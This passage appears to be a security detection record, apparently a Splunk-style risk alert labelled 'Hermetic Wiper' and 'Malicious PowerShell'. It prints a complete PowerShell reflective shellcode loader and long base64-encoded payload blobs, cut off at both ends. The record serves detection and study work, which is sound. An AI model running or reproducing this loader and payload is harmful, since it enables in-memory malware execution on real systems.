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", UserID="'S-1-5-18'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T12:11:44", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:11:44", risk_message="A suspicious powershell script contains reflective class assembly command in function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) } function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] ) $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert]::FromBase64String('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